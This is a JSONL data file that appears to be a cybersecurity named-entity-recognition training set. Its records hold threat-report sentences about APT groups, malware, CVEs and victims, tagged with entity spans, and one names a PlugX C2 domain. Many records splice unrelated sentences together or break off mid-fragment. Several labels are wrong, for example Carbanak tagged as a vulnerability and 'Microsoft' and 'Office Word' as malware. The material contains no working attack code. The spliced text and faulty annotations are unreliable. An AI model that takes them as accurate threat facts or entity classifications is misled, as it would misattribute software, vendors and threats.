{"text": "Below is a list of the payloads used by the Skygofree implant in the second and third stages . OceanLotus’ targets are global . Suckfly is a China based threat group that has been active since at least 2014 .", "spans": {"MALWARE: Skygofree": [[44, 53]], "THREAT_ACTOR: OceanLotus’": [[95, 106]], "THREAT_ACTOR: Suckfly": [[128, 135]]}, "info": {"id": "cyberner_stix_train_002139", "source": "cyberner_stix_train"}}
{"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro .", "spans": {"ORGANIZATION: Connexxa": [[76, 84]], "THREAT_ACTOR: cybercrime gang": [[104, 119]], "ORGANIZATION: banks": [[145, 150]], "ORGANIZATION: e-payment": [[153, 162]], "ORGANIZATION: financial institutions": [[175, 197]], "VULNERABILITY: Carbanak": [[247, 255]], "TOOL: Cobalt": [[260, 266]], "ORGANIZATION: government": [[346, 356]], "MALWARE: PowerShell scripts": [[383, 401]], "MALWARE: Microsoft": [[415, 424]], "MALWARE: Office Word": [[425, 436]]}, "info": {"id": "cyberner_stix_train_002140", "source": "cyberner_stix_train"}}
{"text": "Today , the number of deployed IoT devices outnumber the population of personal computers and mobile phones , combined .", "spans": {"TOOL: IoT": [[31, 34]], "TOOL: computers": [[80, 89]], "TOOL: mobile phones": [[94, 107]]}, "info": {"id": "cyberner_stix_train_002141", "source": "cyberner_stix_train"}}
{"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself . Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora .", "spans": {"MALWARE: Marcher": [[136, 143]], "THREAT_ACTOR: APT32": [[258, 263]], "THREAT_ACTOR: Elderwood": [[467, 476]], "ORGANIZATION: Google": [[567, 573]]}, "info": {"id": "cyberner_stix_train_002142", "source": "cyberner_stix_train"}}
{"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": {"THREAT_ACTOR: Wild Neutron": [[98, 110]], "TOOL: Java": [[141, 145]], "VULNERABILITY: zero-day": [[146, 154]], "VULNERABILITY: exploit": [[155, 162]]}, "info": {"id": "cyberner_stix_train_002143", "source": "cyberner_stix_train"}}
{"text": "] net svc [ . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . About four months after The New York Times publicized an attack on its network , the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"TOOL: KeyBoy": [[158, 164]], "TOOL: string obfuscation routine": [[179, 205]], "ORGANIZATION: New York Times": [[311, 325]], "FILEPATH: Backdoor.APT.Aumlib": [[434, 453]], "FILEPATH: Backdoor.APT.Ixeshe": [[458, 477]]}, "info": {"id": "cyberner_stix_train_002144", "source": "cyberner_stix_train"}}
{"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: LATINUM": [[0, 7]], "TOOL: self-deleting malicious components": [[69, 103]], "TOOL: server side logic": [[118, 135]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2012-0158": [[284, 297]], "MALWARE: NetTraveler Trojan": [[309, 327]]}, "info": {"id": "cyberner_stix_train_002145", "source": "cyberner_stix_train"}}
{"text": "Like CozyDuke , OnionDuke appears to have been designed with versatility in mind , and takes a similarly modular platform approach .", "spans": {"MALWARE: CozyDuke": [[5, 13]], "MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_002146", "source": "cyberner_stix_train"}}
{"text": "Noting who is targeted , with what malware , and with what types of lures provide clues with which organizations can improve their security posture .", "spans": {}, "info": {"id": "cyberner_stix_train_002147", "source": "cyberner_stix_train"}}
{"text": "In the wild , these are only distributed as a direct download from unofficial Web pages ( “ third-party ” app ) and not through legitimate app stores . Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector . maturity level , There are more unused URLs in the script .", "spans": {"THREAT_ACTOR: APT38": [[165, 170]], "ORGANIZATION: Financial Exchange banks": [[203, 227]], "ORGANIZATION: financial organizations": [[238, 261]], "ORGANIZATION: media organizations": [[319, 338]], "ORGANIZATION: financial sector": [[359, 375]]}, "info": {"id": "cyberner_stix_train_002148", "source": "cyberner_stix_train"}}
{"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 . Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN . The United States government also threatened to step in when it looked like a U.S. company was going to purchase NSO Group , an infamous Israeli maker of the Pegasus spyware .", "spans": {"TOOL: Emissary Trojan": [[458, 473]], "ORGANIZATION: ESET": [[803, 807]], "FILEPATH: Win32/HackedApp.Winnti.A": [[839, 863]], "FILEPATH: Win32/HackedApp.Winnti.B": [[866, 890]], "FILEPATH: Win32/Winnti.AG": [[908, 923]], "FILEPATH: Win64/Winnti.BN": [[950, 965]], "ORGANIZATION: The United States government": [[968, 996]], "ORGANIZATION: a U.S. company": [[1044, 1058]], "MALWARE: the Pegasus spyware": [[1122, 1141]]}, "info": {"id": "cyberner_stix_train_002149", "source": "cyberner_stix_train"}}
{"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: MSPs": [[75, 79]], "ORGANIZATION: information technology": [[235, 257]], "ORGANIZATION: IT": [[260, 262]]}, "info": {"id": "cyberner_stix_train_002150", "source": "cyberner_stix_train"}}
{"text": "The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: .WCRY extension": [[50, 65]], "ORGANIZATION: CSIS": [[221, 225]], "MALWARE: Carbanak": [[259, 267]], "ORGANIZATION: customers": [[297, 306]]}, "info": {"id": "cyberner_stix_train_002151", "source": "cyberner_stix_train"}}
{"text": "Besides providing the ability to execute arbitrary commands on the target system , these utilities normally don’t raise suspicion as they are commonly whitelisted by Antivirus and other commercial security software .", "spans": {}, "info": {"id": "cyberner_stix_train_002152", "source": "cyberner_stix_train"}}
{"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": {"TOOL: ASPXTool": [[46, 54]], "TOOL: OwaAuth credential stealing tool": [[189, 221]], "TOOL: Web shell": [[226, 235]], "ORGANIZATION: bank": [[421, 425]]}, "info": {"id": "cyberner_stix_train_002153", "source": "cyberner_stix_train"}}
{"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was “ Video downloader master ” with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware . In mid-2018 , Kaspersky's report on Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": {"MALWARE: Android/AdDisplay.Ashas family": [[31, 61]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: Ashas": [[142, 147]], "ORGANIZATION: Kaspersky's": [[258, 269]], "THREAT_ACTOR: Lazarus": [[330, 337]], "MALWARE: KONNI": [[440, 445]]}, "info": {"id": "cyberner_stix_train_002154", "source": "cyberner_stix_train"}}
{"text": "Most of them use the same mutex structure , share the same fake icon and unique metadata details , file writes , registry operations , and fake common program metadata , as seen in DustySky samples .", "spans": {"TOOL: mutex": [[26, 31]]}, "info": {"id": "cyberner_stix_train_002155", "source": "cyberner_stix_train"}}
{"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 . Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 . Tortoiseshell Facebook Attack Campaign", "spans": {"MALWARE: Desert Scorpion": [[287, 302]], "ORGANIZATION: banks": [[437, 442]], "THREAT_ACTOR: Lazarus": [[446, 453]], "THREAT_ACTOR: attacker": [[549, 557]], "THREAT_ACTOR: Elfin": [[635, 640]], "ORGANIZATION: Symantec": [[745, 753]]}, "info": {"id": "cyberner_stix_train_002156", "source": "cyberner_stix_train"}}
{"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": {"MALWARE: EventBot": [[45, 53]], "MALWARE: the decoy PDF": [[213, 226]], "ORGANIZATION: Coast Guard": [[271, 282]], "MALWARE: Elise sample": [[339, 351]]}, "info": {"id": "cyberner_stix_train_002157", "source": "cyberner_stix_train"}}
{"text": "Finally , it is worth noting that while most of the compilation timestamps for CosmicDuke samples appear to be authentic , we are aware of a few cases of them being forged .", "spans": {"MALWARE: CosmicDuke": [[79, 89]]}, "info": {"id": "cyberner_stix_train_002158", "source": "cyberner_stix_train"}}
{"text": "The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand .", "spans": {"THREAT_ACTOR: attacker’s": [[55, 65]], "ORGANIZATION: FireEye": [[137, 144]], "TOOL: ATM": [[168, 171]], "MALWARE: malware": [[172, 179]], "MALWARE: RIPPER": [[200, 206]], "ORGANIZATION: banks": [[318, 323]]}, "info": {"id": "cyberner_stix_train_002159", "source": "cyberner_stix_train"}}
{"text": "android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: APT41": [[108, 113]], "ORGANIZATION: Department of Homeland Security": [[264, 295]], "ORGANIZATION: DHS": [[298, 301]], "ORGANIZATION: FBI": [[346, 349]], "ORGANIZATION: Russian government": [[369, 387]], "ORGANIZATION: military": [[493, 501]], "ORGANIZATION: government": [[506, 516]]}, "info": {"id": "cyberner_stix_train_002160", "source": "cyberner_stix_train"}}
{"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company . The decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode . The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"SYSTEM: Microsoft Office": [[498, 514]], "ORGANIZATION: Mandiant": [[597, 605]], "THREAT_ACTOR: APT35": [[641, 646]], "ORGANIZATION: energy company": [[660, 674]], "TOOL: StreamTransformationFilter": [[725, 751]], "TOOL: StreamTransformation": [[767, 787]], "ORGANIZATION: Talos": [[848, 853]], "ORGANIZATION: Open Babel": [[884, 894]]}, "info": {"id": "cyberner_stix_train_002161", "source": "cyberner_stix_train"}}
{"text": "It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on Github .", "spans": {"TOOL: Metasploit": [[27, 37]], "TOOL: PowerShell": [[41, 51]], "TOOL: Empire": [[52, 58]], "TOOL: Github": [[96, 102]]}, "info": {"id": "cyberner_stix_train_002162", "source": "cyberner_stix_train"}}
{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "VULNERABILITY: EternalBlue": [[211, 222]], "VULNERABILITY: exploit": [[223, 230]], "SYSTEM: Windows": [[270, 277]], "VULNERABILITY: CVE-2017-0144": [[278, 291]], "VULNERABILITY: CVE-2017-0145": [[296, 309]]}, "info": {"id": "cyberner_stix_train_002163", "source": "cyberner_stix_train"}}
{"text": "Please note that these unblocking instructions are based on an analysis of the current version of Rotexy and have been tested on it . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": {"MALWARE: Rotexy": [[98, 104]], "MALWARE: Acunetix Web Vulnerability Scanner": [[168, 202]], "THREAT_ACTOR: Leviathan": [[317, 326]], "ORGANIZATION: maritime industry": [[353, 370]], "ORGANIZATION: research institutes": [[377, 396]], "ORGANIZATION: academic organizations": [[399, 421]], "ORGANIZATION: private firms": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002164", "source": "cyberner_stix_train"}}
{"text": "This tells us that it is possible either the threat actors or at least one of the targets is located in that area .", "spans": {}, "info": {"id": "cyberner_stix_train_002165", "source": "cyberner_stix_train"}}
{"text": "Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . If it is not in Switzerland , the traffic will proceed as normal .", "spans": {"TOOL: SWCs": [[34, 38]], "THREAT_ACTOR: TG-3390": [[41, 48]]}, "info": {"id": "cyberner_stix_train_002166", "source": "cyberner_stix_train"}}
{"text": "The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"MALWARE: backdoor": [[4, 12]], "FILEPATH: CONFUCIUS_A": [[132, 143]], "MALWARE: SNEEPY": [[262, 268]], "MALWARE: ByeByeShell": [[275, 286]], "ORGANIZATION: Rapid7": [[307, 313]]}, "info": {"id": "cyberner_stix_train_002167", "source": "cyberner_stix_train"}}
{"text": "Since TrickMo ’ s HTTP traffic with its C & C server is not encrypted , it can easily be tampered with . This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple Exfiltration methods .", "spans": {"TOOL: MiniDuke": [[150, 158]], "TOOL: CosmicDuke": [[161, 171]], "TOOL: OnionDuke": [[174, 183]], "TOOL: CozyDuke": [[186, 194]], "THREAT_ACTOR: Dukes": [[209, 214]], "THREAT_ACTOR: cyberespionage group": [[267, 287]], "MALWARE: ProjectSauron": [[476, 489]]}, "info": {"id": "cyberner_stix_train_002168", "source": "cyberner_stix_train"}}
{"text": "While Google implemented multiple mechanisms , like two-factor-authentication , to prevent hackers from compromising Google accounts , a stolen authorization token bypasses this mechanism and allows hackers the desired access as the user is perceived as already logged in . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . If the setl is always sub-instruction during the optimization , These groups commonly share infrastructure to complete their actions on objectives .", "spans": {"ORGANIZATION: Google": [[6, 12], [117, 123]], "THREAT_ACTOR: group": [[278, 283]], "VULNERABILITY: zero-day vulnerability": [[339, 361]]}, "info": {"id": "cyberner_stix_train_002169", "source": "cyberner_stix_train"}}
{"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[56, 63]], "ORGANIZATION: political intelligence": [[165, 187]], "ORGANIZATION: governments": [[193, 204]], "ORGANIZATION: Dragos": [[216, 222]]}, "info": {"id": "cyberner_stix_train_002170", "source": "cyberner_stix_train"}}
{"text": "Along with the subsequent Process Activity using the newly built PowerShell command , which aligns with what was commented out of the first sample analyzed .", "spans": {"TOOL: PowerShell": [[65, 75]]}, "info": {"id": "cyberner_stix_train_002171", "source": "cyberner_stix_train"}}
{"text": "Google Apps allows organizations to use Gmail as their organizational mail solution .", "spans": {"ORGANIZATION: Google": [[0, 6]], "TOOL: Gmail": [[40, 45]]}, "info": {"id": "cyberner_stix_train_002172", "source": "cyberner_stix_train"}}
{"text": "It was configured to activate via SMS sent from a Czech Republic number . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . and green-colored flattened blocks . It is only when evaluating indicators of attack in the big picture , that the patterns of data collection and attempts to access the network start resembling an adversary with malicious intent .", "spans": {"VULNERABILITY: Carbanak": [[106, 114]], "VULNERABILITY: CVE-2013-3660": [[283, 296]], "THREAT_ACTOR: adversary with malicious intent": [[530, 561]]}, "info": {"id": "cyberner_stix_train_002173", "source": "cyberner_stix_train"}}
{"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . some blocks are deleted by the optimization after defeating opaque predicates , PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: Cleaver": [[196, 203]], "THREAT_ACTOR: Cyber Army": [[257, 267]], "THREAT_ACTOR: Ashiyane": [[282, 290]], "ORGANIZATION: Syrian Electronic Army": [[313, 335]], "ORGANIZATION: PBI Research Services": [[483, 504]]}, "info": {"id": "cyberner_stix_train_002174", "source": "cyberner_stix_train"}}
{"text": "This delay means that a typical testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . The analysis shows us the evolution of KONNI over the last 3 years .", "spans": {"MALWARE: Word document": [[141, 154]], "MALWARE: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[181, 217]], "MALWARE: Update.exe": [[249, 259]], "MALWARE: McUpdate.dll": [[272, 284]], "MALWARE: KONNI": [[328, 333]]}, "info": {"id": "cyberner_stix_train_002175", "source": "cyberner_stix_train"}}
{"text": "“ We ’ re appreciative of both Check Point ’ s research and their partnership as we ’ ve worked together to understand these issues , ” said Adrian Ludwig , Google ’ s director of Android security . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks . When a binary is loaded into IDA Pro , You 'll uncover why the US has seen a significant uptick in ransomware incidents across the board , especially in sectors like education .", "spans": {"ORGANIZATION: Check Point": [[31, 42]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Android": [[180, 187]], "THREAT_ACTOR: APT38": [[244, 249]], "ORGANIZATION: banks": [[309, 314]], "TOOL: IDA Pro": [[346, 353]], "MALWARE: ransomware": [[416, 426]], "ORGANIZATION: education": [[483, 492]]}, "info": {"id": "cyberner_stix_train_002177", "source": "cyberner_stix_train"}}
{"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]]}, "info": {"id": "cyberner_stix_train_002178", "source": "cyberner_stix_train"}}
{"text": "PlugX C2 server : ipsoftwarelabs.com .", "spans": {"MALWARE: PlugX": [[0, 5]], "TOOL: C2": [[6, 8]], "DOMAIN: ipsoftwarelabs.com": [[18, 36]]}, "info": {"id": "cyberner_stix_train_002179", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_002180", "source": "cyberner_stix_train"}}
{"text": "This service , along with the API , was fully decommissioned in March 2019 . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent . The backdoor had the following properties : They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": {}, "info": {"id": "cyberner_stix_train_002181", "source": "cyberner_stix_train"}}
{"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Microsoft": [[11, 20]], "THREAT_ACTOR: APT28": [[69, 74]], "VULNERABILITY: CVE-2016-7855": [[102, 115]], "VULNERABILITY: CVE-2017-0143": [[196, 209]], "VULNERABILITY: exploit": [[237, 244]], "FILEPATH: tools—EternalRomance": [[245, 265]], "FILEPATH: EternalSynergy—that": [[270, 289]]}, "info": {"id": "cyberner_stix_train_002182", "source": "cyberner_stix_train"}}
{"text": "The following factors supporting this assessment are further detailed in this post .", "spans": {}, "info": {"id": "cyberner_stix_train_002183", "source": "cyberner_stix_train"}}
{"text": "Based on this discovery , we began to look for other binaries signed with the South Korean mobile software developer's certificate .", "spans": {}, "info": {"id": "cyberner_stix_train_002184", "source": "cyberner_stix_train"}}
{"text": "We identified 42 apps on Google Play as belonging to the campaign , which had been running since July 2018 . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor . The executable performs the following tasks: If the system is a 64-bit version of Windows , it downloads and executes a specific 64-bit version of the malware thanks to a powershell script .", "spans": {"SYSTEM: Google Play": [[25, 36]], "ORGANIZATION: Kaspersky": [[132, 141]], "THREAT_ACTOR: ScarCruft": [[151, 160]], "TOOL: ROKRAT": [[262, 268]], "SYSTEM: Windows": [[386, 393]], "TOOL: powershell": [[475, 485]]}, "info": {"id": "cyberner_stix_train_002185", "source": "cyberner_stix_train"}}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "VULNERABILITY: e-mail": [[275, 281]], "VULNERABILITY: exploits": [[282, 290]], "VULNERABILITY: CVE-2012-0158": [[291, 304]]}, "info": {"id": "cyberner_stix_train_002186", "source": "cyberner_stix_train"}}
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format . The January 8 attack used a variant of the ThreeDollars delivery document , which we identified as part of the OilRig toolset based on attacks that occurred in August 2017 .", "spans": {"MALWARE: email stealer": [[4, 17]], "FILEPATH: ThreeDollars delivery document": [[295, 325]], "THREAT_ACTOR: OilRig": [[363, 369]]}, "info": {"id": "cyberner_stix_train_002187", "source": "cyberner_stix_train"}}
{"text": "The most significant change in this particular Trojan ’ s history was the encryption of data sent between the device and C & C . Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks . Users can consider adopting security solutions that can defend against malicious bot-related activities such as Outlaw ’s through a cross-generational blend of threat defense techniques . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": {"ORGANIZATION: CTU": [[175, 178]], "ORGANIZATION: political": [[244, 253]], "ORGANIZATION: defense organization": [[258, 278]], "THREAT_ACTOR: Outlaw": [[402, 408]]}, "info": {"id": "cyberner_stix_train_002188", "source": "cyberner_stix_train"}}
{"text": "Microsoft is aware of CVE-2015-1701 and is working on a fix .", "spans": {"ORGANIZATION: Microsoft": [[0, 9]], "VULNERABILITY: CVE-2015-1701": [[22, 35]]}, "info": {"id": "cyberner_stix_train_002189", "source": "cyberner_stix_train"}}
{"text": "XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "MALWARE: TRISIS": [[20, 26]], "TOOL: Triconex": [[71, 79]], "TOOL: industrial control": [[98, 116]], "TOOL: ICS": [[119, 122]]}, "info": {"id": "cyberner_stix_train_002190", "source": "cyberner_stix_train"}}
{"text": "FakeSpy uses an anti-debugging technique by creating another child process of itself . During our research into this attack campaign , Unit 42 gathered several tools that the Emissary Panda uploaded to the three webshells at the two government organizations . Some of the malicious documents were test files without the implant .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "ORGANIZATION: Unit 42": [[135, 142]], "THREAT_ACTOR: Emissary Panda": [[175, 189]], "ORGANIZATION: government organizations": [[233, 257]], "MALWARE: test files": [[297, 307]]}, "info": {"id": "cyberner_stix_train_002191", "source": "cyberner_stix_train"}}
{"text": "As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like changeip.com to establish free subdomains in their infrastructure . When the adversaries' operations are live , they modify the record again to point the C2 domain to an IP address they can access .", "spans": {"TOOL: C2": [[283, 285]]}, "info": {"id": "cyberner_stix_train_002192", "source": "cyberner_stix_train"}}
{"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": {"ORGANIZATION: Securelist": [[21, 31]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[61, 96]], "THREAT_ACTOR: APT40": [[128, 133]], "MALWARE: publicly available tools": [[287, 311]]}, "info": {"id": "cyberner_stix_train_002193", "source": "cyberner_stix_train"}}
{"text": "This mistake in operational security allowed us to gain visibility into exfiltrated content for a number of devices . Only one client , based in Iran , continued to communicate with the infrastructure . Below is a list of zones registered by APT1 that are newsthemed : As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"THREAT_ACTOR: APT1": [[242, 246]], "SYSTEM: Google Analytics": [[272, 288]], "SYSTEM: CSP": [[307, 310]], "THREAT_ACTOR: attacker": [[370, 378]]}, "info": {"id": "cyberner_stix_train_002194", "source": "cyberner_stix_train"}}
